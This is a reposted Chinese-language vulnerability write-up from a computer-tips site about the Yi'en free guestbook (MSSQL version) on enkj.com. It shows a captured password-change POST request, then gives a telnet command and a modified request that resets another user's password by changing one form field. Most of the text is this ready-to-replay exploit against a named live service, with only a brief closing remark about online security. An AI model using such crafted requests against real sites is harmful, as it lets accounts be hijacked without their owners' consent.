萬盛學電腦網

 萬盛學電腦網 >> 應用技巧 >> 億恩免費留言薄MSSQL版修改任意用戶密碼漏洞

億恩免費留言薄MSSQL版修改任意用戶密碼漏洞





億恩免費留言薄MSSQL版修改任意用戶密碼漏洞

漏洞為高風險

比如:
http://enkj.com/gbook/guestbook.asp?user=bingel
這個是我自己申請用來做測試的免費留言簿

我申請完之後進入修改一下密碼

用winsock expert 捕獲了如下數據

POST http://enkj.com/gbook/modifyok.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword,

application/vnd.ms-powerpoint, application/vnd.ms-excel, */*
Referer: http://enkj.com/gbook/modify.asp?edit=ok
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: enkj.com
Content-Length: 122
Pragma: no-cache
Cookie: ASPSESSIONIDCQASSDQA=JHCEGLHCBINJDFOLDAHMKMNG
user=bingel&pass=123456789&zhanzhang=bingel&kind=1&[email protected]
&web=fuck&url=http%3A%2F%2Fsafdafda.com&intro=

這上面一個是關鍵的東東.

有了這個東東你就可以修改任意用戶的密碼了

比如你要修改一個用戶名為lin的用戶的留言簿的密碼.只要

telnet enkj.com 80

然後發送post如下數據就可以了.

POST http://enkj.com/gbook/modifyok.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword,

application/vnd.ms-powerpoint, application/vnd.ms-excel, */*
Referer: http://enkj.com/gbook/modify.asp?edit=ok
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: enkj.com
Content-Length: 122
Pragma: no-cache
Cookie: ASPSESSIONIDCQASSDQA=JHCEGLHCBINJDFOLDAHMKMNG

user=lin&pass=123456789&zhanzhang=bingel&kind=1&[email protected]&web=fuck
&url=http%3A%2F%2Fsafdafda.com&intro=

這樣就把用戶名為lin的用戶的密碼修改為123456789

其它的沒有必要多說,大家看看就知道是怎麼回事了.這個漏洞也只是偶然發現.沒有什麼技術可言.只是給大家一個提醒.
網絡上沒有絕對的安全.
copyright © 萬盛學電腦網 all rights reserved